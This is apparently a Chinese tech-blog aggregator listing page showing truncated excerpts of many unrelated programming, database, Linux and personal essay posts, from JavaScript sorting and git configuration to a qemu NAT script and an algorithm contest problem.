  • 按对象属性排序 换个号韩国红果果 JavaScript对象排序
    利用JavaScript进行对象排序,根据用户的年龄排序展示 <script> var bob={ name;bob, age:30 } var peter={ name;peter, age:30 } var amy={ name;amy, age:24 } var mike={ name;mike, age:29 } var john={
  • 大数据分析让个性化的客户体验不再遥远 蓝儿唯美 数据分析
    顾客通过多种渠道制造大量数据,企业则热衷于利用这些信息来实现更为个性化的体验。 分析公司Gartner表示,高级分析会成为客户服务的关键,但是大数据分析的采用目前仅局限于不到一成的企业。 挑战在于企业还在努力适应结构化数据,疲于根据自身的客户关系管理(CRM)系统部署有效的分析框架,以及集成不同的内外部信息源。 然而,面对顾客通过数字技术参与而产生的快速变化的信息,企业需要及时作出反应。要想实
  • java笔记4 a-john java
    操作符 1,使用java操作符       操作符接受一个或多个参数,并生成一个新值。参数的形式与普通的方法调用不用,但是效果是相同的。加号和一元的正号(+)、减号和一元的负号(-)、乘号(*)、除号(/)以及赋值号(=)的用法与其他编程语言类似。       操作符作用于操作数,生成一个新值。另外,有些操作符可能会改变操作数自身的
  • 从裸机编程到嵌入式Linux编程思想的转变------分而治之:驱动和应用程序 aijuans 嵌入式学习
        笔者学习嵌入式Linux也有一段时间了,很奇怪的是很多书讲驱动编程方面的知识,也有很多书将ARM9方面的知识,但是从以前51形式的(对寄存器直接操作,初始化芯片的功能模块)编程方法,和思维模式,变换为基于Linux操作系统编程,讲这个思想转变的书几乎没有,让初学者走了很多弯路,撞了很多难墙。     笔者因此写上自己的学习心得,希望能给和我一样转变
  • 在springmvc中解决FastJson循环引用的问题 asialee 循环引用fastjson
              我们先来看一个例子:           package com.elong.bms; import java.io.OutputStream; import java.util.HashMap; import java.util.Map; import co
  • ArrayAdapter和SimpleAdapter技术总结 百合不是茶 androidSimpleAdapterArrayAdapter高级组件基础
    ArrayAdapter比较简单,但它只能用于显示文字。而SimpleAdapter则有很强的扩展性,可以自定义出各种效果   ArrayAdapter;的数据可以是数组或者是队列        // 获得下拉框对象 AutoCompleteTextView textview = (AutoCompleteTextView) this
  • 九封信 bijian1013 人生励志
            有时候,莫名的心情不好,不想和任何人说话,只想一个人静静的发呆。有时候,想一个人躲起来脆弱,不愿别人看到自己的伤口。有时候,走过熟悉的街角,看到熟悉的背影,突然想起一个人的脸。有时候,发现自己一夜之间就长大了。         2014,写给人
  • Linux下安装MySQL Web 管理工具phpMyAdmin sunjing PHPInstallphpMyAdmin
    PHP http://php.net/ phpMyAdmin http://www.phpmyadmin.net Error compiling PHP on CentOS x64   一、安装Apache 请参阅http://billben.iteye.com/admin/blogs/1985244   二、安装依赖包 sudo yum install gd
  • 分布式系统理论 bit1129 分布式
    FLP One famous theory in distributed computing, known as FLP after the authors Fischer, Lynch, and Patterson, proved that in a distributed system with asynchronous communication and process crashes,
  • ssh2整合(spring+struts2+hibernate)-附源码 白糖_ eclipsespringHibernatemysql项目管理
    最近抽空又整理了一套ssh2框架,主要使用的技术如下: spring做容器,管理了三层(dao,service,actioin)的对象 struts2实现与页面交互(MVC),自己做了一个异常拦截器,能拦截Action层抛出的异常 hibernate与数据库交互 BoneCp数据库连接池,据说比其它数据库连接池快20倍,仅仅是据说 MySql数据库   项目用eclipse
  • treetable bug记录 braveCS table
    // 插入子节点删除再插入时不能正常显示。修改: //不知改后有没有错,先做个备忘 Tree.prototype.removeNode = function(node) { // Recursively remove all descendants of +node+ this.unloadBranch(node); // Remove
  • 编程之美-电话号码对应英语单词 bylijinnan java算法编程之美
    import java.util.Arrays; public class NumberToWord { /** * 编程之美 电话号码对应英语单词 * 题目: * 手机上的拨号盘,每个数字都对应一些字母,比如2对应ABC,3对应DEF.........,8对应TUV,9对应WXYZ, * 要求对一段数字,输出其代表的所有可能的字母组合
  • jquery ajax读书笔记 chengxuyuancsdn jQuery ajax
    1、jsp页面 <%@ page language="java" import="java.util.*" pageEncoding="GBK"%> <% String path = request.getContextPath(); String basePath = request.getScheme()
  • JWFD工作流拓扑结构解析伪码描述算法 comsci 数据结构算法工作活动J#
      对工作流拓扑结构解析感兴趣的朋友可以下载附件,或者下载JWFD的全部代码进行分析   /*  流程图拓扑结构解析伪码描述算法         public java.util.ArrayList DFS(String graphid, String stepid, int j)
  • oracle I/O 从属进程 daizj oracle
    I/O 从属进程   I/O从属进程用于为不支持异步I/O的系统或设备模拟异步I/O.例如,磁带设备(相当慢)就不支持异步I/O.通过使用I/O 从属进程,可以让磁带机模仿通常只为磁盘驱动器提供的功能。就好像支持真正的异步I/O 一样,写设备的进程(调用者)会收集大量数据,并交由写入器写出。数据成功地写出时,写入器(此时写入器是I/O 从属进程,而不是操作系统)会通知原来的调用者,调用者则会
  • 高级排序:希尔排序 dieslrae 希尔排序
    public void shellSort(int[] array){ int limit = 1; int temp; int index; while(limit <= array.length/3){ limit = limit * 3 + 1;
  • 初二下学期难记忆单词 dcj3sjt126com englishword
    kitchen 厨房 cupboard 厨柜 salt 盐 sugar 糖 oil 油 fork 叉;餐叉 spoon 匙;调羹 chopsticks 筷子 cabbage 卷心菜;洋白菜 soup 汤 Italian 意大利的   Indian 印度的 workplace  工作场所 even 甚至;更 Italy 意大利 laugh 笑 m
  • Go语言使用MySQL数据库进行增删改查 dcj3sjt126com mysql
    目前Internet上流行的网站构架方式是LAMP,其中的M即MySQL, 作为数据库,MySQL以免费、开源、使用方便为优势成为了很多Web开发的后端数据库存储引擎。MySQL驱动Go中支持MySQL的驱动目前比较多,有如下几种,有些是支持database/sql标准,而有些是采用了自己的实现接口,常用的有如下几种: http://code.google.c...o-mysql-dri
  • git命令 shuizhaosi888 git
    ---------------设置全局用户名: git config --global user.name "HanShuliang" //设置用户名 git config --global user.email "[email protected]" //设置邮箱 ---------------查看环境配置 git config --li
  • qemu-kvm 网络 nat模式 (四) haoningabc kvmqemu
    qemu-ifup-NAT #!/bin/bash BRIDGE=virbr0 NETWORK=192.168.122.0 GATEWAY=192.168.122.1 NETMASK=255.255.255.0 DHCPRANGE=192.168.122.2,192.168.122.254 TFTPROOT= BOOTP= function check_bridge()
  • 不要让未来的你,讨厌现在的自己 jingjing0907 生活 奋斗 工作 梦想
     故事one  23岁,他大学毕业,放弃了父母安排的稳定工作,独闯京城,在家小公司混个小职位,工作还算顺手,月薪三千,混了混,混走了一年的光阴。    24岁,有了女朋友,从二环12人的集体宿舍搬到香山民居,一间平房,二人世界,爱爱爱。偶然约三朋四友,打扑克搓麻将,日子快乐似神仙;    25岁,出了几次差,调了两次岗,薪水涨了不过百,生猛狂飙的物价让现实血淋淋,无力为心爱银儿购件大牌
  • 枚举类型详解 一路欢笑一路走 enum枚举详解enumsetenumMap
    枚举类型详解 一.Enum详解      1.1枚举类型的介绍   JDK1.5加入了一个全新的类型的”类”—枚举类型,为此JDK1.5引入了一个新的关键字enum,我们可以这样定义一个枚举类型。      Demo:一个最简单的枚举类   public enum ColorType { RED
  • 第11章 动画效果(上) onestopweb 动画
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Eclipse中jsp、js文件编辑时,卡死现象解决汇总 ljf_home eclipsejsp卡死js卡死
    使用Eclipse编辑jsp、js文件时,经常出现卡死现象,在网上百度了N次,经过N次优化调整后,卡死现象逐步好转,具体那个方法起到作用,不太好讲。将所有用过的方法罗列如下:   1、取消验证 windows–>perferences–>validation 把 除了manual 下面的全部点掉,build下只留 classpath dependency Valida
  • MySQL编程中的6个重要的实用技巧 tomcat_oracle mysql
    每一行命令都是用分号(;)作为结束 对于MySQL,第一件你必须牢记的是它的每一行命令都是用分号(;)作为结束的,但当一行MySQL被插入在PHP代码中时,最好把后面的分号省略掉,例如: mysql_query("INSERT INTO tablename(first_name,last_name)VALUES('$first_name',$last_name')");
  • zoj 3820 Building Fire Stations(二分+bfs) 阿尔萨斯 Build
    题目链接:zoj 3820 Building Fire Stations 题目大意:给定一棵树,选取两个建立加油站,问说所有点距离加油站距离的最大值的最小值是多少,并且任意输出一种建立加油站的方式。 解题思路:二分距离判断,判断函数的复杂度是o(n),这样的复杂度应该是o(nlogn),即使常数系数偏大,但是居然跑了4.5s,也是醉了。 判断函数里面做了3次bfs,但是每次bfs节点最多
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他